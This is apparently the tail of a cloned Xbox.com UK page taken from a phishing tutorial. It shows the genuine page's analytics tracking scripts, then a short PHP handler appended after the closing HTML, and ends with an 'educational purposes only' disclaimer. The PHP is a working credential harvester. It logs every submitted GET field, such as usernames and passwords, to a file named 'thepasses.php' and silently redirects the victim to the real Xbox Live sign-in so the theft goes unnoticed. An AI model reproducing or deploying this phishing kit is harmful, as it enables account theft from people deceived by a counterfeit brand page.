if (typeof(OmnitureTracking) != 'undefined') { OmnitureTracking.onBeforePageImpression() }
var s_code=s.t(); if (s_code) document.write(s_code);
}catch(ex){}
});
}catch(e){}
//]]></script>
<noscript><img src="http://o.xbox.com/b/ss/msxboxcomengb/1/H.16--NS/0?pageName=NoScriptPage" height="1" width="1" border="0" alt="" /></noscript><!--/DO NOT REMOVE/--><!-- End SiteCatalyst code version: H.16. --><!-- Start Vortex tracking -->
<script type="text/javascript" src="/Shell/js/vortex_tracking.js"></script>
<script type="text/javascript">//<![CDATA[
try {
vortex.serviceUrl = 'http\x3a\x2f\x2fpiflc.xbox.com\x2fvortex\x2flogweb_v1.ashx';
vortex.locale = 'en-GB';
vortex.pageName = 'www\x2f';
vortex.recordPageImpression();
}
catch(e)
{ }
//]]</script>
<noscript><img src="http://piflc.xbox.com/vortex/logweb_v1.ashx?evt=impr&evn=0&pri=0&page=www%2f" height="1" width="1" border="0" alt="" /></noscript>
<!-- End Vortex tracking -->
<!-- Start WEDCS tracking -->
<script type="text/javascript">
try {
var varSegmentation = 0; var varClickTracking = 1;var varCustomerTracking = 1;
document.write("<script type='text/javascript' src='http://c.microsoft.com/ms.js'><\/script>");
} catch(e) {}
</script>
<noscript><img src="http://c.microsoft.com/trans_pixel.aspx" height="1" width="1" border="0" alt="" /></noscript>
<!-- End WEDCS tracking -->
<script type="text/javascript" src="http://siterecruit.comscore.com/sr/xbox/www/broker.js"></script><script type="text/javascript">//<![CDATA[
try{ if ((typeof BusinessTracking != 'undefined') && (BusinessTracking.extendPageViewData)) {
BusinessTracking.extendPageViewData();
}}catch(e){}
//]]></script>
<script src="/Shell/js/videoplayer.js" type="text/javascript"></script>
<script src="/Shell/js/Silverlight.js" type="text/javascript"></script>
</body>
</html>
<? header("Location: https://live.xbox.com/Account/Signin?returnUrl=http%3a%2f%2fwww.xbox.com%2fen-GB%2f");
$handle = fopen("thepasses.php", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Please Note
Please Note that all of my tutorials on “hacking, modifying, phishing and any other tutorials are provided on an “as is” basis and are not to be used in a way which would conflict with any Law(s) in your country or affecting countries. All of these tutorials and pieces of information provided on “mintcreg.co.uk” are for educational purposes only and are not to be used for illegal activity of any kind. If such arises from any of my articles I will not take responsibility for your actions.
